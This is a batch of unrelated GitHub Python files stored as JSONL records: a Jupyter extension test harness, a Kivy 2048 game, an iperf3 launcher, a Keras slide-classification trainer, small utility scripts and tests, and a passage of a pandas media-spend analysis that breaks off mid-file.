{"seq_id":"69898789925","text":"# -*- coding: utf-8 -*-\n\"\"\"Base TestCase classes for nbextensions tests.\"\"\"\n\nfrom __future__ import (\n    absolute_import, division, print_function, unicode_literals,\n)\n\nimport logging\nimport os\nimport sys\nfrom threading import Event, Thread\n\nfrom jupyter_contrib_core.notebook_compat import serverextensions\nfrom jupyter_contrib_core.testing_utils import (\n    GlobalMemoryHandler, get_wrapped_logger, wrap_logger_handlers,\n)\nfrom jupyter_contrib_core.testing_utils.jupyter_env import patch_jupyter_dirs\nfrom nose.plugins.skip import SkipTest\nfrom notebook.notebookapp import NotebookApp\nfrom notebook.tests.launchnotebook import NotebookTestBase\nfrom tornado.ioloop import IOLoop\nfrom traitlets.config import Config\nfrom traitlets.traitlets import default\n\ntry:\n    from unittest.mock import Mock\nexcept ImportError:\n    from mock import Mock  # py2\n\nno_selenium = True\ntry:\n    from selenium import webdriver\nexcept ImportError:\n    pass\nelse:\n    no_selenium = False\n    from selenium.common.exceptions import TimeoutException\n    from selenium.webdriver.common.by import By\n    from selenium.webdriver.remote import remote_connection\n    from selenium.webdriver.support import expected_conditions as ec\n    from selenium.webdriver.support.ui import WebDriverWait\n    # don't show selenium debug logs\n    remote_connection.LOGGER.setLevel(logging.INFO)\n\n\nclass NoseyNotebookApp(NotebookApp):\n    \"\"\"Wrap the regular logging handler(s). 
For use inside nose tests.\"\"\"\n\n @default('log')\n def _log_default(self):\n \"\"\"wrap loggers for this application.\"\"\"\n return wrap_logger_handlers(NotebookApp._log_default(self))\n\n\nclass NbextensionTestBase(NotebookTestBase):\n \"\"\"\n Base class for nbextensions test case classes.\n\n We override the setup_class method from NotebookTestBase in order to\n install things, and also to set log_level to debug.\n Also split some of the setup_class method into separate methods in order to\n simplify subclassing.\n \"\"\"\n config = Config(NotebookApp={'log_level': logging.DEBUG})\n\n # these are added for notebook < 4.1, where url_prefix wasn't defined.\n # However, due to the fact that the base_url body data attribute in the\n # page template isn't passed through the urlencode jinja2 filter,\n # we can't expect a base_url which would need encoding to work :(\n if not hasattr(NotebookTestBase, 'url_prefix'):\n url_prefix = '/ab/'\n\n @classmethod\n def base_url(cls):\n return 'http://localhost:%i%s' % (cls.port, cls.url_prefix)\n\n _install_user = False\n _install_sys_prefix = False\n\n @classmethod\n def pre_server_setup(cls):\n \"\"\"Setup extensions etc before running the notebook server.\"\"\"\n # added to install things!\n cls.log.info('Enabling jupyter_nbextensions_configurator')\n inst_func = serverextensions.toggle_serverextension_python\n inst_funcname = '.'.join([inst_func.__module__, inst_func.__name__])\n logger = get_wrapped_logger(\n name=inst_funcname, log_level=logging.DEBUG)\n serverextensions.toggle_serverextension_python(\n 'jupyter_nbextensions_configurator', enabled=True, logger=logger,\n user=cls._install_user, sys_prefix=cls._install_sys_prefix)\n\n @classmethod\n def get_server_kwargs(cls, **overrides):\n kwargs = dict(\n port=cls.port,\n port_retries=0,\n open_browser=False,\n runtime_dir=cls.jupyter_dirs['server']['runtime'],\n notebook_dir=cls.jupyter_dirs['server']['notebook'],\n base_url=cls.url_prefix,\n config=cls.config,\n )\n # disable auth-by-default, introduced in notebook PR #1831\n if 'token' in NotebookApp.class_trait_names():\n kwargs['token'] = ''\n kwargs.update(overrides)\n return kwargs\n\n @classmethod\n def start_server_thread(cls, started_event):\n \"\"\"\n Start a notebook server in a separate thread.\n\n The start is signalled using the passed Event instance.\n \"\"\"\n cls.log.info('Starting notebook server app thread')\n app = cls.notebook = NoseyNotebookApp(**cls.get_server_kwargs())\n # don't register signal handler during tests\n app.init_signal = lambda: None\n # start asyncio loop explicitly in notebook thread\n # (tornado 4 starts per-thread loops automatically, asyncio doesn’t)\n if 'asyncio' in sys.modules:\n import asyncio\n asyncio.set_event_loop(asyncio.new_event_loop())\n app.initialize(argv=[])\n loop = IOLoop.current()\n loop.add_callback(started_event.set)\n try:\n app.start()\n finally:\n # set the event, so failure to start doesn't cause a hang\n started_event.set()\n # app.session_manager.close call was added after notebook 4.0\n if hasattr(app.session_manager, 'close'):\n app.session_manager.close()\n\n @classmethod\n def _setup_patches(cls):\n (cls.jupyter_patches, cls.jupyter_dirs,\n remove_jupyter_dirs) = patch_jupyter_dirs()\n # store in a list to avoid confusion over bound/unbound method in pypy\n cls.removal_funcs = [remove_jupyter_dirs]\n try:\n for ptch in cls.jupyter_patches:\n ptch.start()\n\n # patches for items called in NotebookTestBase.teardown_class\n # env_patch needs a start method as well 
because of a typo in\n # notebook 4.0 which calls it in the teardown_class method\n cls.env_patch = cls.path_patch = Mock(['start', 'stop'])\n cls.home_dir = cls.config_dir = cls.data_dir = Mock(['cleanup'])\n cls.runtime_dir = cls.notebook_dir = Mock(['cleanup'])\n cls.tmp_dir = Mock(['cleanup'])\n except Exception:\n for func in cls.removal_funcs:\n func()\n raise\n\n @classmethod\n def setup_class(cls):\n \"\"\"Install things & setup a notebook server in a separate thread.\"\"\"\n cls.log = get_wrapped_logger(cls.__name__)\n cls._setup_patches()\n cls.pre_server_setup()\n try:\n started = Event()\n cls.notebook_thread = Thread(\n target=cls.start_server_thread, args=[started])\n cls.notebook_thread.start()\n started.wait()\n cls.wait_until_alive()\n except Exception:\n for func in cls.removal_funcs:\n func()\n raise\n\n @classmethod\n def teardown_class(cls):\n try:\n # call superclass to stop notebook server\n super(NbextensionTestBase, cls).teardown_class()\n finally:\n try:\n for ptch in cls.jupyter_patches:\n ptch.stop()\n finally:\n for func in cls.removal_funcs:\n func()\n\n\ndef _skip_if_no_selenium():\n if no_selenium:\n raise SkipTest('Selenium not installed. '\n 'Skipping selenium-based test.')\n if os.environ.get('TRAVIS_OS_NAME') == 'osx':\n raise SkipTest(\"Don't do selenium tests on travis osx\")\n\n\nclass SeleniumNbextensionTestBase(NbextensionTestBase):\n\n # browser logs from selenium aren't very useful currently, but if you want\n # them, you can set the class attribute show_driver_logs to have them\n # output via the GlobalMemoryHandler on test failure\n show_driver_logs = False\n\n @classmethod\n def setup_class(cls):\n cls.init_webdriver()\n cls._failure_occurred = False # flag for logging\n super(SeleniumNbextensionTestBase, cls).setup_class()\n\n @classmethod\n def init_webdriver(cls):\n cls.log = get_wrapped_logger(cls.__name__)\n _skip_if_no_selenium()\n\n if hasattr(cls, 'driver'):\n return cls.driver\n if (os.environ.get('CI') and os.environ.get('TRAVIS') and\n os.environ.get('SAUCE_ACCESS_KEY')):\n cls.log.info(\n 'Running in CI environment. Using Sauce remote webdriver.')\n username = os.environ['SAUCE_USERNAME']\n access_key = os.environ['SAUCE_ACCESS_KEY']\n capabilities = {\n # 'platform': 'Mac OS X 10.9',\n 'platform': 'Linux',\n 'browserName': 'firefox',\n 'version': 'latest',\n 'tags': [os.environ['TOXENV'], 'CI'],\n 'name': cls.__name__\n }\n hub_url = 'http://{}:{}@ondemand.saucelabs.com:80/wd/hub'.format(\n username, access_key)\n if os.environ.get('TRAVIS'):\n # see https://docs.travis-ci.com/user/gui-and-headless-browsers\n # and https://docs.travis-ci.com/user/sauce-connect\n capabilities.update({\n 'tunnel-identifier': os.environ['TRAVIS_JOB_NUMBER'],\n 'build': os.environ['TRAVIS_BUILD_NUMBER'],\n })\n cls.driver = webdriver.Remote(\n desired_capabilities=capabilities, command_executor=hub_url)\n else:\n cls.log.info('Using local webdriver.')\n cls.driver = webdriver.Firefox()\n return cls.driver\n\n def run(self, results):\n \"\"\"Run a given test. 
Overridden in order to access results.\"\"\"\n # in py2 unittest, run doesn't return the results object, so we need to\n # create one in order to have a reference to it.\n if results is None:\n results = self.defaultTestResult()\n super(SeleniumNbextensionTestBase, self).run(results)\n if results.failures or results.errors:\n self.__class__._failure_occurred = True\n return results\n\n @classmethod\n def _print_logs_on_failure(cls):\n if cls._failure_occurred:\n cls.log.info('\\n'.join([\n '',\n '\\t\\tFailed test!',\n '\\t\\tCaptured logging:',\n ]))\n GlobalMemoryHandler.rotate_buffer(1)\n GlobalMemoryHandler.flush_to_target()\n\n browser_logger = get_wrapped_logger(\n name=cls.__name__ + '.driver', log_level=logging.DEBUG)\n if cls.show_driver_logs:\n cls.log.info('\\n\\t\\tjavascript console logs below...\\n\\n')\n for entry in cls.driver.get_log('browser'):\n level = logging._nameToLevel.get(\n entry['level'], logging.ERROR)\n msg = entry['message'].strip()\n browser_logger.log(level, msg)\n record, target = GlobalMemoryHandler._buffer[-1]\n record.ct = entry['timestamp'] / 1000.\n GlobalMemoryHandler._buffer[-1] = record, target\n GlobalMemoryHandler.flush_to_target()\n\n if (not cls._failure_occurred) or os.environ.get('CI'):\n cls.log.info('closing webdriver')\n cls.driver.quit()\n else:\n cls.log.info('keeping webdriver open')\n\n @classmethod\n def teardown_class(cls):\n cls._print_logs_on_failure()\n super(SeleniumNbextensionTestBase, cls).teardown_class()\n\n @classmethod\n def wait_for_element(cls, presence_cond, message, timeout=5):\n \"\"\"WebDriverWait for an element to appear, fail test on timeout.\"\"\"\n try:\n return WebDriverWait(cls.driver, timeout).until(\n ec.presence_of_element_located(presence_cond))\n except TimeoutException:\n if message:\n raise cls.failureException(message)\n else:\n raise cls.failureException(\n '{}No element matching condition {!r} found in {}s'.format(\n message, presence_cond, timeout))\n\n @classmethod\n def wait_for_selector(cls, css_selector, message='', timeout=5):\n \"\"\"WebDriverWait for a selector to appear, fail test on timeout.\"\"\"\n if message:\n message += '\\n'\n message = '{}No element matching selector {!r} found in {}s'.format(\n message, css_selector, timeout)\n return cls.wait_for_element(\n (By.CSS_SELECTOR, css_selector), message=message, timeout=timeout)\n\n @classmethod\n def wait_for_partial_link_text(cls, link_text, message='', timeout=5):\n \"\"\"WebDriverWait for a link to appear, fail test on timeout.\"\"\"\n if message:\n message += '\\n'\n message = (\n '{}No element matching partial link text '\n '{!r} found in {}s').format(message, link_text, timeout)\n return cls.wait_for_element((By.PARTIAL_LINK_TEXT, link_text),\n message=message, timeout=timeout)\n\n @classmethod\n def wait_for_xpath(cls, xpath, message='', timeout=5):\n \"\"\"WebDriverWait for a selector to appear, fail test on timeout.\"\"\"\n if message:\n message += '\\n'\n message = '{}No element matching xpath {!r} found in {}s'.format(\n message, xpath, timeout)\n return cls.wait_for_element(\n (By.XPATH, xpath), message=message, timeout=timeout)\n","repo_name":"Jupyter-contrib/jupyter_nbextensions_configurator","sub_path":"tests/nbextensions_test_base.py","file_name":"nbextensions_test_base.py","file_ext":"py","file_size_in_byte":13168,"program_lang":"python","lang":"en","doc_type":"code","stars":961,"dataset":"github-code","pt":"52"} +{"seq_id":"28475082280","text":"import random\nimport kivy\n\nfrom kivy.app import App\nfrom kivy.core.window 
import Window\nfrom kivy.config import Config\nfrom kivy.clock import Clock\nfrom kivy.uix.label import Label\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.properties import NumericProperty\n\nConfig.set(\"graphics\", \"width\", 600)\nConfig.set(\"graphics\", \"height\", 600)\n\n\nclass Box(Label):\n\n    value = NumericProperty()\n\n    def __init__(self, **kwargs):\n        self.value = kwargs.pop(\"value\")\n        super(Box, self).__init__(**kwargs)\n\n    def on_value(self, value, instance):\n        pass\n\n\nclass GameSpace(GridLayout):\n\n    def __init__(self, **kwargs):\n        super(GameSpace, self).__init__(**kwargs)\n\n        self._keyboard = Window.request_keyboard(self._keyboard_closed, self)\n        self._keyboard.bind(on_key_down=self.on_keyboard_down)\n        self._keyboard.bind(on_key_up=self.on_keyboard_up)\n\n        grid_coor = [[0 for _ in range(row, row + 4)] for row in range(0, 16, 4)]\n        for row in grid_coor:\n            for value in row:\n                self.add_widget(Box(value=value))\n        self.new_box()\n        self.new_box()\n\n    def new_box(self):\n        empty_boxed = []\n        for each in self.children:\n            if each.value == 0:\n                empty_boxed.append(self.children.index(each))\n        self.children[random.choices(empty_boxed)[0]].value = 2\n\n    def _keyboard_closed(self):\n        self._keyboard.unbind(on_key_down=self.on_keyboard_down)\n        self._keyboard.unbind(on_key_up=self.on_keyboard_up)\n        self._keyboard = None\n\n    def get_box(self, row, col):\n        return self.children[-row * 4 + 4 - col]\n\n    def check_value(self, current_box, next_box):\n        print(current_box.value, next_box.value)\n        if next_box.value == 0:\n            next_box.value = current_box.value\n            current_box.value = 0\n            # self.new_box()\n            return next_box\n        elif next_box.value == current_box.value:\n            next_box.value = current_box.value * 2\n            current_box.value = 0\n            # self.new_box()\n            return next_box\n\n    def on_keyboard_down(self, keyboard, keycode, text, modifiers):\n        if keycode[1] == \"up\" or keycode[1] == \"down\":\n            for col in range(1, 5):\n                if keycode[1] == \"up\":\n                    for box in range(2, 5):\n                        current_box = self.get_box(box, col)\n                        for element in range(box - 1, 0, -1):\n                            current_box = self.check_value(current_box, self.get_box(element, col))\n                            if not current_box:\n                                break\n                elif keycode[1] == \"down\":\n                    for box in range(1, 4):\n                        current_box = self.get_box(box, col)\n                        for element in range(box + 1, 5):\n                            current_box = self.check_value(current_box, self.get_box(element, col))\n                            if not current_box:\n                                break\n\n        elif keycode[1] == \"left\" or keycode[1] == \"right\":\n            for row in range(1, 5):\n                if keycode[1] == \"left\":\n                    for box in range(2, 5):\n                        current_box = self.get_box(row, box)\n                        for element in range(box - 1, 0, -1):\n                            current_box = self.check_value(current_box, self.get_box(row, element))\n                            if not current_box:\n                                break\n\n                elif keycode[1] == \"right\":\n                    for box in range(1, 4):\n                        current_box = self.get_box(row, box)\n                        for element in range(box + 1, 5):\n                            current_box = self.check_value(current_box, self.get_box(row, element))\n                            if not current_box:\n                                break\n        self.new_box()\n\n    def on_keyboard_up(self, keyboard, keycode):\n        pass\n\n\nclass NumberStackApp(App):\n    pass\n\n\nNumberStackApp().run()\n\n","repo_name":"jeffsui1412/2048","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"39950977450","text":"#!/usr/bin/python\n\nimport sys\nfrom subprocess import check_output\nfrom subprocess import Popen\n\n# This application is used to launch communication between hosts via the iperf3 
utility\nip_addr = str(sys.argv[1])\nmode = str(sys.argv[2])\nif mode == 'server':\n command = 'iperf3 -s -B ' + ip_addr + ' -i 1 &'\nelse:\n command = 'iperf3 -c ' + ip_addr + ' -u -b 100M -i 1 -t 20 &'\nprocess = Popen(command, shell = True)\np = str(process.pid)\nprint(p)\n","repo_name":"ArtemShendyapin/sdn_mininet","sub_path":"sdn_testbed/communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14259021474","text":"'''Train a simple deep CNN on the polygonal annotated slides using OpenSlideGenerator.\n'''\n\nfrom __future__ import print_function\nfrom matplotlib import cm\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nimport tensorflow.keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Activation, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras.optimizers import RMSprop\nimport os\nimport math\nimport time\nfrom datetime import datetime\nimport openslide_generator\n\ndef plot_loss_history(training_history, logscale=False):\n loss = training_history['loss']\n val_loss = training_history['val_loss']\n epochs = range(1, len(loss) + 1)\n plt.plot(epochs, loss, color='red', label='Training loss')\n plt.plot(epochs, val_loss, color='green', label='Validation loss')\n plt.title('Training and validation loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n if logscale:\n plt.yscale('log')\n plt.show()\n\n \ndef plot_accuracy_history(training_history):\n acc = training_history['accuracy']\n val_acc = training_history['val_accuracy']\n epochs = range(1, len(acc) + 1)\n plt.plot(epochs, acc, color='red', label='Training acc')\n plt.plot(epochs, val_acc, color='green', label='Validation acc')\n plt.title('Training and validation accuracy')\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n plt.show()\n\n\n\n\nprint(\"Definition generator\")\n# create generator instance\ngen_train = openslide_generator.OpenSlideGenerator('C:/Users/arno/Documents/fourthbrain/capstone/data/labels/labels_train.txt', \\\n 'C:/Users/arno/Documents/fourthbrain/capstone/data/training/', 512, 256, fetch_mode='label-slide', label_to_use=0)\n\nprint(\"gen_train defined\")\n\ngen_val = openslide_generator.OpenSlideGenerator('C:/Users/arno/Documents/fourthbrain/capstone/data/labels/labels_val.txt', \\\n 'C:/Users/arno/Documents/fourthbrain/capstone/data/training/', 512, 256, fetch_mode='label-slide', label_to_use=0)\n\nprint(\"gen_val defined\")\n\nprint(f'fetch_mode: {gen_train.fetch_mode}')\n\nbatch_size = 100\nnum_classes = len(gen_train.labels[gen_train.label_to_use])\nepochs = 1\ndata_augmentation = False\nnum_predictions = 20\nsave_dir = os.path.join(os.getcwd(), 'saved_models')\nmodel_name = 'keras_openslide_trained_model.h5'\nt_steps = math.ceil(gen_train.patch_per_epoch/batch_size)\nv_steps = math.ceil(gen_val.patch_per_epoch/batch_size)\n\n#print(f'gen_train.label_to_use: {gen_train.label_to_use}')\n#print(f'gen_train.labels[gen_train.label_to_use]: {gen_train.labels[gen_train.label_to_use]}')\n#print(f'gen_train.labels: {gen_train.labels}')\n\nprint(f't_steps: {t_steps}')\nprint(f'v_steps: {v_steps}')\nprint(f'num_classes: {num_classes}')\n\n# model construction\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), padding='same',\n input_shape=gen_train.shape()))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(32, (3, 
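Because the launcher above interpolates `ip_addr` straight into a `shell=True` command string, a hedged variant using an argument list avoids shell injection while keeping the same iperf3 flags. This is a sketch, not the author's script; note that `Popen` is already non-blocking, so the trailing `&` is unnecessary once the shell is dropped:

```python
import sys
from subprocess import Popen

def launch_iperf3(ip_addr: str, mode: str) -> int:
    # same flags as the original: server binds to ip_addr, client sends
    # 100 Mbit/s UDP for 20 seconds with 1-second reporting intervals
    if mode == 'server':
        args = ['iperf3', '-s', '-B', ip_addr, '-i', '1']
    else:
        args = ['iperf3', '-c', ip_addr, '-u', '-b', '100M', '-i', '1', '-t', '20']
    return Popen(args).pid  # argument list: ip_addr cannot inject shell commands

if __name__ == '__main__':
    print(launch_iperf3(sys.argv[1], sys.argv[2]))
```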
3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(64, (3, 3), padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes))\nmodel.add(Activation('softmax'))\n\n# initiate RMSprop optimizer\nopt = RMSprop(learning_rate=0.0001, decay=1e-6)\n\n# Let's train the model using RMSprop\nmodel.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'])\n\nprint(\"model compile successful\")\n# Fit the model on the batches generated by datagen.flow().\ntraining_history = model.fit(gen_train.flow(batch_size=batch_size),\nsteps_per_epoch=t_steps, \nepochs=epochs, \nvalidation_data=gen_val.flow(batch_size=batch_size),\nvalidation_steps=v_steps,\nworkers=4,\nuse_multiprocessing=True,\nverbose=1)\n\nnow = datetime.now()\nmodel.save('C:/Users/arno/Documents/fourthbrain/capstone/model/model_' + str(now.strftime(\"%Y%m%d_%H%M\")),save_format='tf')\nprint('Saved trained model')\n\nplot_accuracy_history(training_history.history)\nplot_loss_history(training_history.history)\nplot_loss_history(training_history.history, logscale=True)\n\n\n\n\n","repo_name":"roedersen/keras-OpenSlideGenerator","sub_path":"train_camelyon.py","file_name":"train_camelyon.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"38785037387","text":"''' This exercise will take the jokeAPI function from the last exercise \nand format the output in a way that is human-readable and easy to understand.'''\n\n# Import our JokeAPI function\nfrom easy import jokeAPI\n\n# This is our parseJson function. It takes ugly Json and pulls what we need from it. In this case: A funny programming Joke!\ndef parseJson():\n \n # Here I am assigning a variable to our jokeAPI function so I can call it easier.\n joke_Main = jokeAPI()\n \n # We then want to know what type of joke it will be. \n # We noticed that it can either be a \"single\" or \"twopart\" type of joke. \n # The JSON response will greatly differ based on what type of joke we recieve.\n joke_Type = joke_Main[\"type\"]\n\n # If joke_type is a \"twopart\": we will want two key values from the dictionary keys [\"setup\"] and [\"delivery\"].\n if joke_Type == \"twopart\":\n joke_key1 = joke_Main[\"setup\"]\n joke_key2 = joke_Main[\"delivery\"]\n return print(f'\\n{joke_key1} {joke_key2}\\n')\n \n # Else: we want the [\"joke\"] key value from a \"single\" joke_type.\n else:\n joke_Parse = joke_Main[\"joke\"]\n return print(f'\\n{joke_Parse}\\n')\n\n# Our main function is simple and acts a kickstart or more literally a script. It is the brain of your code.\ndef main():\n parseJson()\n\n# Code actually begins here! 
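Once the SavedModel directory above has been written, reloading it for inference is straightforward. The timestamped path and the 512x512x3 patch shape below are assumptions inferred from the `model.save(...)` call and the generator arguments, not verified values:

```python
import numpy as np
import tensorflow as tf

# hypothetical timestamped directory produced by model.save(..., save_format='tf')
model = tf.keras.models.load_model('model/model_20230101_0000')
patches = np.random.rand(4, 512, 512, 3).astype('float32')  # assumed gen_train.shape()
probs = model.predict(patches)       # per-class softmax probabilities
print(probs.argmax(axis=1))          # predicted class index for each patch
```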
If the code is being called locally (not imported) it will run main().\nif __name__ == \"__main__\":\n main()\n","repo_name":"knappmi/Python__Projects","sub_path":"Get_API.py","file_name":"Get_API.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32507249887","text":"# echoclient.py\nfrom socket import socket, AF_INET, SOCK_STREAM\nfrom message import send_message, recv_message\n\ndef main(addr):\n sock = socket(AF_INET, SOCK_STREAM)\n sock.connect(addr)\n while True:\n msg = input(\"Say> \")\n if not msg:\n break\n send_message(sock, msg.encode('utf-8')) \n response = recv_message(sock)\n print(\"Received>\", response.decode('utf-8'))\n sock.close()\n \nmain(('localhost', 20_001))\n","repo_name":"AlexanderKosik/pyraft","sub_path":"experiments/dabeaz_raft/warumup/echoclient.py","file_name":"echoclient.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8356236034","text":"from collective.linguaanalytics.tests import base\nfrom collective.linguaanalytics.viewlets import analytics\nfrom zope.schema.interfaces import WrongContainedType\n\n\nclass IntegrationTestAnalyticsTrackingViewlet(base.IntegrationTestCase):\n \"\"\"unittest for the viewlet\"\"\"\n\n def setUp(self):\n super(IntegrationTestAnalyticsTrackingViewlet, self).setUp()\n init = analytics.AnalyticsTrackingViewlet\n self.request = self.layer['request']\n self.viewlet = init(self.portal, self.request, None, None)\n\n def test_init(self):\n init = analytics.AnalyticsTrackingViewlet\n viewlet = init(self.portal, self.request, None, None)\n self.assertTrue(hasattr(viewlet, '_settings'))\n self.assertTrue(hasattr(viewlet, '_code'))\n self.assertTrue(hasattr(viewlet, '_navigation_root_url'))\n\n def test_available(self):\n #no mapping\n self.assertTrue(not self.viewlet.available())\n\n #add working mapping\n self.viewlet.settings.mapping = ['http://nohost/plone|UA-xxxxxx-x']\n self.assertTrue(self.viewlet.available())\n\n #unactivate\n self.viewlet.settings.activated = False\n self.assertTrue(not self.viewlet.available())\n self.viewlet.settings.activated = True\n\n def test_getTrackingWebProperty(self):\n self.viewlet.settings.mapping = ['http://nohost/plone|UA-xxxxxx-x']\n code = self.viewlet.getTrackingWebProperty()\n self.assertTrue(code == \"UA-xxxxxx-x\")\n\n self.viewlet._code = \"Foo\"\n code = self.viewlet.getTrackingWebProperty()\n self.assertTrue(code == \"Foo\")\n self.viewlet._code = None\n\n #test bad url\n self.viewlet._navigation_root_url = 'http://notmapped/plone'\n code = self.viewlet.getTrackingWebProperty()\n self.assertTrue(code is None)\n\n def test_mapping(self):\n self.viewlet.settings.mapping = ['http://nohost|UA-xxxxxx-x',\n 'http://nohost.fr|UA-yyyyyy-y']\n self.assertRaises(WrongContainedType,\n self.viewlet.settings.__setattr__,\n 'mapping',\n [None])\n self.assertRaises(WrongContainedType,\n self.viewlet.settings.__setattr__,\n 'mapping',\n ['BAD'])\n mapping = self.viewlet.mapping\n self.assertTrue(mapping.get('http://nohost') == 'UA-xxxxxx-x')\n self.assertTrue(mapping.get('http://nohost.fr') == 'UA-yyyyyy-y')\n self.assertTrue(len(mapping) == 
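The echo client above depends on `send_message`/`recv_message` from a `message` module that is not included in this record. A common implementation is 4-byte length-prefixed framing; the sketch below is an assumption about what that module might contain, not its actual source:

```python
from socket import socket

def send_message(sock: socket, payload: bytes) -> None:
    # 4-byte big-endian size header followed by the payload
    sock.sendall(len(payload).to_bytes(4, 'big') + payload)

def recv_exactly(sock: socket, n: int) -> bytes:
    # recv() may return short reads, so loop until n bytes arrive
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('socket closed mid-message')
        buf += chunk
    return buf

def recv_message(sock: socket) -> bytes:
    size = int.from_bytes(recv_exactly(sock, 4), 'big')
    return recv_exactly(sock, size)
```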
2)\n","repo_name":"toutpt/collective.linguaanalytics","sub_path":"collective/linguaanalytics/tests/test_integration_trackingviewlet.py","file_name":"test_integration_trackingviewlet.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35785695454","text":"class PairRandomCrop:\n image_crop_position = {}\n\n def __init__(self, size):\n import random\n import os\n import numbers\n\n from PIL import ImageOps\n\n self.os = os\n self.random = random\n self.ImageOps = ImageOps\n\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n\n def __call__(self, img):\n w, h = img.size\n th, tw = self.size\n if w == tw and h == th:\n return img\n\n pid = self.os.getpid()\n if pid in self.image_crop_position:\n x1, y1 = self.image_crop_position.pop(pid)\n else:\n x1 = self.random.randint(0, w - tw)\n y1 = self.random.randint(0, h - th)\n self.image_crop_position[pid] = (x1, y1)\n return img.crop((x1, y1, x1 + tw, y1 + th))\n","repo_name":"yippp/FSRCNN","sub_path":"dataset/PairRandomCrop.py","file_name":"PairRandomCrop.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"35314918554","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport pandas as pd\nimport json\nimport os\nimport datetime\nimport numpy as np\nimport glob\n\n# Email to be allocated from EE to DMA, not done yet\n\n\n# In[2]:\n\ntoday_str=str(datetime.datetime.now().date())\nwriter_folder=\"/home/jian/Projects/Big_Lots/TMR/To_Spencer/output/\"+today_str+\"/\"\ntry:\n os.stat(writer_folder)\nexcept:\n os.mkdir(writer_folder)\n\n\n# In[ ]:\n\n\n\n\n# In[3]:\n\nNational_TV_2017=pd.read_csv(\"/home/jian/Projects/Big_Lots/TMR/To_Spencer/finaltvlogs_0306.csv\",dtype=str)\n\nNational_TV_2017['impression']=National_TV_2017['Act Impression'].astype(float)\nNational_TV_2017['cost']=National_TV_2017['Net Cost'].astype(float)\nNational_TV_2017['week_start_date']=National_TV_2017['Week BL'].apply(lambda x: datetime.datetime.strptime(x,\"%m/%d/%y\").date())\nNational_TV_2017=National_TV_2017[National_TV_2017['week_start_date']<datetime.date(2017,12,30)]\nNational_TV_2017=National_TV_2017[National_TV_2017['week_start_date']>=datetime.date(2016,10,2)]\n\n\n# In[4]:\n\nNational_TV_2017=National_TV_2017[['week_start_date','cleaned DMA','Media Type','Network','impression','cost']]\nNational_TV_2017=National_TV_2017.groupby(['week_start_date','cleaned DMA','Media Type','Network'])['impression','cost'].sum().reset_index()\nNational_TV_2017=National_TV_2017.rename(columns={\"cleaned DMA\":\"cleaned dma\",\"Media Type\":\"submedia\",\"Network\":\"placement\"})\nNational_TV_2017['submedia']=National_TV_2017['submedia'].replace(['National Cable','DirecTV'],\"National\")\nNational_TV_2017['submedia']=National_TV_2017['submedia'].replace(['Spot Cable', 'Spot Broadcast', 'FOOTPRINT-SINCLAIR'],\"Local\")\nNational_TV_2017=National_TV_2017[National_TV_2017['submedia']==\"National\"]\n\n\n# In[5]:\n\nNational_TV_2017['impression'].sum()\n\n\n# In[6]:\n\ndata_Joann=pd.read_table(\"/home/jian/Projects/Big_Lots/TMR/To_Spencer/Up_to_2018Q2/BL ALL TMR 0926 updated.dat\",sep=\"\\t\",dtype=str)\ndata_Joann['week date']=data_Joann['week date'].apply(lambda x: datetime.datetime.strptime(x,\"%m/%d/%Y\").date())\n\n\n# 
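The `PairRandomCrop` class above coordinates two successive calls within the same process: the first call picks a crop origin and stashes it keyed by `os.getpid()`, the second pops it, so an input/target pair gets cropped at identical coordinates. A usage sketch (image sizes chosen arbitrarily):

```python
from PIL import Image

crop = PairRandomCrop(32)            # class defined above
lr = Image.new('RGB', (100, 100))    # stand-in input image
hr = Image.new('RGB', (100, 100))    # stand-in target image
lr_patch = crop(lr)   # picks and remembers (x1, y1) for this process
hr_patch = crop(hr)   # pops the remembered (x1, y1) -> same crop window
assert lr_patch.size == hr_patch.size == (32, 32)
```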
